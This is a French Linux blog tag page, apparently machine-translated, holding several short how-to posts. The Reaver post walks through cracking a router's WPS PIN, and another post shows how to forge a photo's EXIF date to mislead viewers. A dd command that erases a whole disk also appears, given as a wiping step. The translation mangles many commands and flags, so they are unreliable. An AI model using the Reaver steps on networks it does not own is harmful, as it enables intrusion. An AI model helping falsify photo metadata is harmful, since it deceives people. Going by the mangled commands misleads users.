Posts Tagged 'Sécurité'

RetroShare est une application multi-plateforme pour le partage de fichiers à travers le réseau F2F , qui est considéré comme très sûr car il s'authentifie avec GPG et vous vous connectez via un tunnel SSH . Sur le site officiel , il ya des paquets prêts à l'emploi pour les différentes distributions. Dans le cas spécifique de Debian, il est paquet de 32 bits uniquement pour Squeeze, puisque j'utilise Sid amd64, j'ai eu à organiser:

wget http://ppa.launchpad.net/csoler-users/retroshare-snapshots/ubuntu/pool/main/r/retroshare/retroshare_0.5.3-0.5256~oneiric_amd64.deb

sudo dpkg-i-retroshare_0.5.3 0,5256 ~ oneiric_amd64.deb

une fois que vous démarrez la configuration est intuitive.

jouir ;)

Share on Tumblr http://img337.imageshack.us/img337/4888/retroshare.png Digg This Submit to reddit Part
Mots-clefs: ,

Commentaires 2 Commentaires »

J'avais déjà parlé dans le passé de ExifTool , un outil qui est utilisé pour extraire toutes les données EXIF d'une photo. Dans la pension il ya certainement d'autres programmes pour obtenir les données EXIF, mais c'est ce que j'utilise depuis quelques années maintenant et je suis affezzionato. Dans mon référentiel paquets sont prêts:

Télécharger amd64

Télécharger i386

jouir ;)

Share on Tumblr http://www.edmondweblog.com/wp-includes/images/smilies/icon_wink.gif Digg This Submit to reddit Part
Mots-clefs: , , ,

Commentaires Sans commentaires »

Ces derniers temps arrive d'avoir des lecteurs flash USB ou disques durs en abondance, et puis ne pas être en mesure de les utiliser. Parfois, vous donnez ou vendez ces lecteurs, et comme une question de sécurité, il serait préférable de s'assurer que personne n'est le plaisir de rappeler certains renseignements personnels. Il été démontré que plus de 30% de tous les ordinateurs connectés à l'Internet tous les jours, surfant sur ​​des sites pornos, enregistrer des photos et des vidéos sale, comment ne picchiopc . Donc, le but est de rendre la vie difficile pour ceux qui veulent jeter un regard dans les habitudes des autres :) Une fois que vous avez identifié le disque doit être formaté, la commande est simple:

  $ Sudo dd if = / dev / zero of = / dev / sdX 

jouir ;)

Share on Tumblr http://img268.imageshack.us/img268/8607/harddiskhot.png Digg This Submit to reddit Part
Mots-clefs: , ,

Commentaires 18 Commentaires »

Placez dans un seul CD / DVD ou lecteur flash USB, plusieurs systèmes d'exploitation, peut être très pratique, à la fois en termes d'économies de la même CD / DVD soit parce que vous aurez à portée de main, tous les outils qui peuvent nous aider à résoudre certains problèmes. L'autre facteur important, à mon avis, et que ce Live CD / DVD, peut être intégré dans des architectures multiples, donc qui aura sur leurs disques durs différents O: S. diferrenti et de l'architecture, vous trouverez un outil unique qui lui permettra de chroottarsi nécessaire. multicd n'est rien de plus qu'un script qui nous aide à construire notre DVD personnalisé, I, par exemple, j'ai un mutidistro DVD, 3,8 gabarit, construit à l'intérieur d'un 64 bits Debian Live, Clonezilla, Backtrack, GParted, Ultimate Boot CD.

Exigences:

Obtenir la certification ISO de l' OS supportés :

et alors:

  $ Wget ftp://downloads.tuxfamily.org/multicd/multicd-6.8.sh 

  $ Chmod + x multicd-6.8.sh 

  # Apt-get install genisoimage 

À ce stade, vous devez changer les noms des systèmes ont téléchargé, comme décrit sur ​​le site , par exemple:

 $ Mv debian-live-6.0.3-i386-gnome-desktop.iso binary.iso $ mv Clonezilla-live-1.2.8-46-i686.iso $ clonezilla.iso etc.  etc.  etc. 

Maintenant il suffit d'exécuter le script multicd, et attendre quelques minutes:

  # ./multicd-6.8.sh 

jouir ;)

Share on Tumblr http://img26.imageshack.us/img26/8687/multicd.png Digg This Submit to reddit Part
Mots-clefs: ,

Commentaires 13 Commentaires »

Mon sheela

J'ai déjà parlé dans le passé de exiftool , et combien il est important de supprimer les métadonnées qui sont cachés dans une photo, avant de le distribuer autour. Toutefois, pour des raisons que je ne suis pas ici pour expliquer, je vérifie toujours les données dans les images, parce que, il me fait réaliser, avec l'aide de questions précises plus tard, si la personne qui a envoyé dit la vérité. Mais si je voulais mentir délibérément? à croire que la photo a été prise dans une autre date, puis tromper un œil négligent? .... comment? Simple, il suffit de manipuler les données avec exiftool . A titre d'exemple, le tableau est légèrement port «purifié» de mon sheela, prise en 2007. Les données relatives à la photo sont les suivantes:

ORIGINAL:

edmond @ Debianbox: ~ / Desktop / test $ exiftool-un-u-g1 sheela.jpg
- ExifTool -
ExifTool Nombre Version: 8.60
- Système -
Nom du fichier: sheela.jpg
Répertoire:.
Taille du fichier: 189 ko
Modification du fichier Date / Heure: 2007:09:30 15:23:51 +02:00
Autorisations de fichier: rw-r -
- Fichier -
Type de fichier: JPEG
type MIME: image / jpeg
Largeur de l'image: 500
Hauteur de l'image: 375
Processus de codage: Baseline DCT, codage de Huffman
Bits par échantillon: 8
Composants Couleur: 3
Y Cb Cr Sous échantillonnage: YCbCr4: 4:04 (1 1)
- JFIF -
JFIF Version: 01:01
Résolution Unité: pouces
Résolution X: 72
Résolution Y: 72
- Composite -
Taille de l'image: 500 x 375

puis de manipuler la date, de faire une copie de l'original, la commande à utiliser est la suivante:

  $ ExifTool-datetimeoriginal = '2012: 01:15 14:50:04 'foto.jpg 

FAUX:

edmond @ Debianbox: ~ / Desktop / test $ exiftool-datetimeoriginal = '2012: 01:15 14:50:04 'sheela.jpg
1 mise à jour des fichiers d'image
edmond @ Debianbox: ~ / Desktop / test $ exiftool-un-u-g1-sheela.jpg - ExifTool -
ExifTool Nombre Version: 8.60
- Système -
Nom du fichier: sheela.jpg
Répertoire:.
Taille du fichier: 190 ko
Modification du fichier Date / Heure: 2012:01:15 14:50:37 +01:00
Autorisations de fichier: rw-r -
- Fichier -
Type de fichier: JPEG
type MIME: image / jpeg
Exif Byte Order: Big-endian (Motorola, MM)
Largeur de l'image: 500
Hauteur de l'image: 375
Processus de codage: Baseline DCT, codage de Huffman
Bits par échantillon: 8
Composants Couleur: 3
Y Cb Cr Sous échantillonnage: YCbCr4: 4:04 (1 1)
- JFIF -
JFIF Version: 01:01
Résolution Unité: pouces
Résolution X: 72
Résolution Y: 72
- IFD0 -
Résolution X: 72
Résolution Y: 72
Résolution Unité: pouces
Y Cb Cr Positionnement: Centré
- ExifIFD -
Exif Version: 0230
Date / heure d'origine: 2012:01:15 14:50:04
Configuration de composants: Y, Cb, Cr, -
Flashpix Version: 0100
Espace couleur: sRGB
- Composite -
Taille de l'image: 500 x 375

pour effacer toutes les métadonnées:

  $ ExifTool-all = foto.jpg 
 

jouir ;)

Share on Tumblr http://img542.imageshack.us/img542/622/sheela.jpg Digg This Submit to reddit Part
Mots-clefs: ,

Commentaires Sans commentaires »

Reaver WPS échoue avec une force brute d'attaque pour décrypter le mot de passe WPA/WPA2 notre réseau sous certaines conditions. De tous les WPS ou Wi-Fi Protected Setup est commun dans les routeurs d'une première maison, il est généralement situé sous wifi-protection. La vulnérabilité réside dans prorpio cette norme, parce que, si vous utilisez la broche de mode d'insertion à la place du bouton-poussoir, ce qui ouvre une faille. Pratiquement bombardant le paquet de routeur, il renvoie une foule de renseignements utiles à la fissuration. Toutefois, dans le réseau des explications plus complètes et détaillées. Tout d'abord vous devez installer aircrack-ng , et compilarselo , car il n'est plus présent dans les dépôts officiels, ou d'obtenir de mon référentiel . Afin d'avoir saccageur sur Debian:

  $ Sudo apt-get install libsqlite3-dev libpcap0.8 - dev 

  $ Wget http://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz 

  $ Tar-xvf saccageur-1.3.tar.gz 

  $ Reaver-1.3/src cd / 

  $. / Configure 

  Faire $ 

  $ Sudo make install 

mettre la carte en mode moniteur:

  # Airmon-ng wlan0 commencer 

La commande ci-dessus va créer mon0 en mode moniteur

Interface Chipset Driver

wlan0 Ralink 2561 PCI rt61pci - [phy0]
(Mode moniteur activé sur mon0)

balayage pour détecter les réseaux WPA:

  # Walsh-i mon0 - ignore-fcs 

attaque:

  # Reaver-i mon0-b 00:11:22:33:44:55 - dh-petit 

pour d'autres commandes de lire la documentation à l'intérieur du paquet.

jouir ;)

Share on Tumblr http://img600.imageshack.us/img600/4707/reaverwps.jpg Digg This Submit to reddit Part
Mots-clefs: , , ,

Commentaires 11 Commentaires »

Metasploit est un projet de sécurité informatique qui fournit des informations sur les vulnérabilités, simplifie tests de pénétration et aide à la mise au point de systèmes de détection d'intrusion. Le sous-projet le plus connu est le Metasploit Framework, un outil de développement et d'exécution d'exploiter contre une machine distante. D'autres sous-projets importants sont la base de données Opcode, l'archive de shellcode et la recherche de la sécurité ( Wikipedia ) Il existe plusieurs distributions Linux qui traitent de tester la sécurité d'un système, dont le plus célèbre est Backtrack . Mais nous pouvons également installer Metasploit sur ​​notre distribution préférée, dans ce cas de Debian Squeeze.

Exigences:

# apt-get install build-essential subversion ruby libruby irb rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby libiconv-ruby rubygems sqlite3 libsqlite3-ruby libsqlite3-dev

Installation:

$ svn co http://metasploit.com/svn/framework3/trunk/ metasploit

$ cd metasploit

$ svn up

démarrer en mode console:

$ ./msfconsole

Appuyez sur pour afficher l'aide pour plus de commandes. Pour le moment, je vais m'arrêter ici, à savoir dans un guide à paraître n'exclut pas de poursuivre avec des exemples d'utilisation.

jouir ;)

Share on Tumblr http://img254.imageshack.us/img254/3883/metasploitp.png Digg This Submit to reddit Part
Mots-clefs: , ,

Commentaires 6 Commentaires »

Pour moi, il arrive souvent que je vais bloquer la porte de la cdrom et donc vous ne pouvez pas éjecter le CD / DVD, cela peut dépendre de la mauvaise qualité d'un CD, peut-être ceux rw utilisé un nombre infini de fois. Dans ce cas, 98 fois sur 100, vous devez redémarrer même en tant que:

$ Eject / dev/cdrom0

ne parvient pas à éjecter, puis la solution est de désactiver le verrouillage de la porte cdrom:

# Echo 0> / proc / sys / dev / cdrom / autoclose

# Echo 0> / proc / sys / dev / cdrom / verrouillage

d'apporter des modifications finales:

# Nano / etc / sysctl.conf

et insérer:

dev.cdrom.autoclose = 0
dev.cdrom.lock = 0

Share on Tumblr Save on Delicious Digg This Submit to reddit Part
Tags: , , ,

Commentaires Sans commentaires »